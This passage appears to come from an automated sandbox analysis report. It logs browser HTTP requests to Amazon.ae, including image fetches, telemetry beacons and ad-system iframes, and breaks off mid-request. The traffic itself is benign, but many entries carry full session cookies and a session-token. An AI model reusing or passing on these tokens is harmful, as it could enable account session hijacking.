    Source: global trafficHTTP traffic detected: GET /images/I/91KwPLW4BqL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/21cxge8YxxL.AC_SX250.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/81bNucIe89L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_08_printers_en._CB568181090_.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rd/uedata?ld&v=0.295223.0&id=646E5TEYAMSGQRNCHWPV&sw=1280&sh=1024&vw=1263&vh=907&m=1&sc=646E5TEYAMSGQRNCHWPV&ue=3&bb=1115&ns=1199&ne=1297&af=1300&be=6775&fp=1297&fcp=1297&pc=11396&tc=-1475&na_=-1475&ul_=-1723729094514&_ul=-1723729094514&rd_=-1723729094514&_rd=-1723729094514&fe_=-1471&lk_=-1450&_lk=-1450&co_=-1450&_co=-813&sc_=-1450&rq_=-813&rs_=-25&_rs=1008&dl_=-17&di_=6838&de_=6838&_de=6849&_dc=11395&ld_=11395&_ld=-1723729094514&ntd=-1&ty=0&rc=0&hob=2&hoe=3&ld=11398&t=1723729105912&ctb=1&rt=_af:7-2-3-1-2-4-0_ld:57-10-5-35-5-6-0&csmtags=aui|aui:aui_build_date:3.24.6-2024-08-09|aui:css:cache|aui:js:cache|aui:sw:page_proxy:no_ctrl|mutObsYes|mutObsActive|ewc:unpersist|ewc:unpersist:emptycart|ewc:bview|ewc|ewc:unrec|ewc:cartsize:0|ewc:aui|navbar|FWCIMEnabled|fls-eu-amazon-ae|perfYes|fy_cdn_fr|ak_cdn_mp|adblk_no|csm-feature-touch-enabled:false&viz=visible:3&pty=Landing&spty=BrowsePage&pti=30082653031&tid=1GXSAVZ7MBDVTNT0VYNB&aftb=1&ui=2&lob=1 HTTP/1.1Host: www.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY; csm-hit=tb:s-646E5TEYAMSGQRNCHWPV|1723729095629&t:1723729101394&adb:adblk_no
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY; csm-hit=tb:s-646E5TEYAMSGQRNCHWPV|1723729095629&t:1723729101394&adb:adblk_no
    Source: global trafficHTTP traffic detected: GET /1/events/com.amazon.csm.csa.prod HTTP/1.1Host: unagi.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /s/iu3?d=amazon.ae&slot=navFooter&a2=0101ea4ef5389a5c57e24d430a268c4430b4509d0a53852f76d6a2872cad8dfecd06&old_oo=0&ts=1723729095791&s=ASS7k3cmwUH4OC1O9BSIEM7rXLw16XAgRkpA7IxVAtpk&gdpr_consent=&gdpr_consent_avl=&cb=1723729095791&dcc=t HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-id=A94x7cOy0E6VmJKhhQVGd4s|t
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3Alcp%26lcp%3D3545%26pc%3D11439%26at%3D11439%26t%3D1723729105953%26csmtags%3Daui%3Asw%3Abrowser%3Aregister%3Asupported%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:11439 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_07_calculators_en._CB568181090_.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_09_pencils_en._CB568181090_.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/81iJG2js5-S._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71Rzh1WKGfL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_10_pens_en._CB568181090_.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61byCU9Ne1L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_11_highlighters_en._CB568181090_.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/912+P-6LIYL._AC_SF226,226_QL85_.jpg?aicid=discounts-widgets-horizonte HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26sw%3D1280%26sh%3D1024%26vw%3D1263%26vh%3D907%26m%3D1%26sc%3DB82A0YC1SM3B4A82DCGS%26ue%3D9%26bb%3D112%26ns%3D404%26ne%3D459%26be%3D887%26fp%3D522%26fcp%3D522%26pc%3D1291%26tc%3D-1087%26na_%3D-1087%26ul_%3D-1723729107980%26_ul%3D-1723729107980%26rd_%3D-1723729107980%26_rd%3D-1723729107980%26fe_%3D-1084%26lk_%3D-1045%26_lk%3D-1045%26co_%3D-1045%26_co%3D-319%26sc_%3D-1045%26rq_%3D-318%26rs_%3D-41%26_rs%3D902%26dl_%3D-31%26di_%3D953%26de_%3D954%26_de%3D967%26_dc%3D1285%26ld_%3D1285%26_ld%3D-1723729107980%26ntd%3D-1%26ty%3D0%26rc%3D0%26hob%3D8%26hoe%3D9%26ld%3D1293%26t%3D1723729109273%26ctb%3D1%26rt%3D__ld%3A10-4-2-3-2-5-0%26csmtags%3Daui%7Caui%3Aaui_build_date%3A3.24.6-2024-08-09%7CmutObsYes%7Caui%3Acss%3Acache%7Caui%3Ajs%3Acache%7Cewc%3Aunpersist%7Cewc%3Aunpersist%3Aemptycart%7Cewc%3Abview%7Cewc%7Cewc%3Aunrec%7Cewc%3Acartsize%3A0%7Cewc%3Aaui%7Cnavbar%7Caui%3Asw%3Apage_proxy%3Ano_ctrl%7CFWCIMEnabled%7Cfls-eu-amazon-ae%7CperfYes%7CmutObsActive%7Cadblk_no%26viz%3Dvisible%3A8%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26lob%3D1:1296 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26sc0%3Daui%3Asw%3Appft%3Acallback_ricb%26bb0%3D74%26pc0%3D485%26ld0%3D485%26t0%3D1723729108465%26sc1%3Dportal-bb%26pc1%3D2%26ld1%3D2%26t1%3D1723729108095%26sc2%3DcsmCELLSframework%26bb2%3D891%26pc2%3D891%26ld2%3D891%26t2%3D1723729108871%26sc3%3DcsmCELLSpdm%26bb3%3D891%26pc3%3D893%26ld3%3D893%26t3%3D1723729108873%26sc4%3DcsmCELLSvpm%26bb4%3D893%26pc4%3D893%26ld4%3D893%26t4%3D1723729108873%26sc5%3DcsmCELLSfem%26bb5%3D894%26pc5%3D894%26ld5%3D894%26t5%3D1723729108874%26sc6%3Due_sushi_v1%26bb6%3D895%26pc6%3D896%26ld6%3D896%26t6%3D1723729108876%26ctb%3D1:1296 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /s/iu3?d=amazon.ae&slot=navFooter&a2=0101ea4ef5389a5c57e24d430a268c4430b4509d0a53852f76d6a2872cad8dfecd06&old_oo=0&ts=1723729109248&s=Af5D1pdzSpZN3vzBIs8y647oIb11-5LpyOOnjozr1HGA&gdpr_consent=&gdpr_consent_avl=&cb=1723729109248 HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-id=A94x7cOy0E6VmJKhhQVGd4s; ad-privacy=0
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26ctb%3D1%26sc0%3Daui%3Asw%3Actrl_changed%26bb0%3D71%26pc0%3D13061%26ld0%3D13061%26t0%3D1723729107575%26csmtags%3Daui%3Asw%3Actrl_changed%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:13061 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /images/S/sash/JT89MwO$JunoYts.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /s/v3/pr?exlist=n-xr-HMT_n-id-HMT_n-audex_n-weborama-pca_n-eq-HMT3_n-ix-HMT_bk_n-y-HMT_n-cx-HMT_n-telaria_n-dm2-HMT_fw_n-fo-HMT_n-kr-new_n-bsw-hmt_n-st-HMT1_n-rb-HMT3_n-fw-HMT1_adb_mp_af_n-sk_n-mediarithmics_g_kr_n-lm-HMT3_ox_index_n-tl-HMT_n-semasio-ecm_n-kg-HMT_n-gg-HMT2_an_n-pm-HMT_n-g-hmt_nsln_fbca_n-ym-HMT_n-sc_pm_n-ox-hmt&fv=1.0&ex-pl-fbca=N3EFGF3vTTeRiAfcQ-KSyQ&a=cm&ex-pl-n-kr-new=ijvxdYgbTRe11sFt-i5GpQ&dmt=1&gdpr_consent=&ex-pl-n-g-hmt=ulDk4Qz9S9q6Ri79q3LtYA&ep=ttam_T219Ay-cPciHbT10oYeEN8M0rrnJ_N93j0wtIiyhRo_tZ9cY4mnyPKb1X63DCavMEQrd17XI7jGXJOd_J_TgJEN-hnUrpFBHD94hK6cBJX02tssL2TrFQoEM8QDYhk_lwBFeGVB2BcbDMFFjYuW82FE3kgQkMWKQNH0T489bIL_HD8HxBABVYtThQb354qNsEJ3dbRzFFCq2d_KzbcvV9b4UXX-T4hGQHAFe73J3acXUJge4oSW0mHX8qflEkNCvhXnGztXS2nyVETBKCaiIrLKkbD_UPc6KDfeOtChyf7ZcSZP3KxVam4W2vznMRxPbhsyuyi10szEWG49kOjZRSRQbuNP0hPR25C62Lcx9GKeXASzgrsjao7_TpR-TMK50PZDd3JwFStg83jo0KGSE9xlY3VrxdGeqL_ELPvHLrXPWy984gN_u7So5epb00YkgzUALXiD_QQC6QIFy6SQsfWbXJs3MeqEvc-juSN4mcKGfc8q2YMQGAyoTk2Lt61byBosRXFcUH1zZaFXRGX1W7HlrsTgA3Qhg0bvCaNTQ8-NEgqOG4khSFxIn9EmClPQgKHHxmXUY4NjFbiLO5epr2IhfDj03X3PvAGvsN9FIE_qfvb0eX4hNTmmuDhWDB8r_kFA9tXuHdrWEVtEZGR4m9XwztZUud5p6rGR3U6mJDxVOHFd894StD1t56vlXi-46Aj6C-8BYOgF0Xa8lr6F9UmVzo-3eFtVttteQO8bv9qLxtXXQRHg3CJejpMOZeGPjzajBbE4KaPfYEuCw4hqRpVzeIVlEYpGEOJq3tgawDqaXaksBfMT9i5V7yxb3eP__COvgYoGTI_rKdZyqDpMHCByt7yYY90B7_rBDblIlSlwV6eZCL2WEaQD5riKE38UZLQ5tgfH6-L0C82op1JBCWnf82DOSqhGCiL276aF1tBjo0HGBzv_mKTVNzG-pPW2spKyzLNsjTG2NT6-_YUBRB2oLSt_vBKcEmnyzfZzNy-53mNqwaYfc8YmMSUpNIcL7E_qvnPAdirGsxudn8Bc50UXJjVxDi6YoLRwhGsGBjW5fzBfOh2SAckYVIN7HVXS_Xzvfeu_cmyoVrkmC1Zl0rW3uvToku4Nkv-rfVmqiX83HtEP7-K8X33BZPA6CY-F0XG8776jrDMRmIsnCA HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-id=A94x7cOy0E6VmJKhhQVGd4s; ad-privacy=0
    Source: global trafficHTTP traffic detected: GET /images/G/39/javascripts/lib/popover/images/snake._CB485935011_.gif HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3AbrowserQuiteMut%26pc%3D15073%26at%3D15073%26t%3D1723729109587%26csmtags%3DbrowserQuiteMut%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:15073 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; 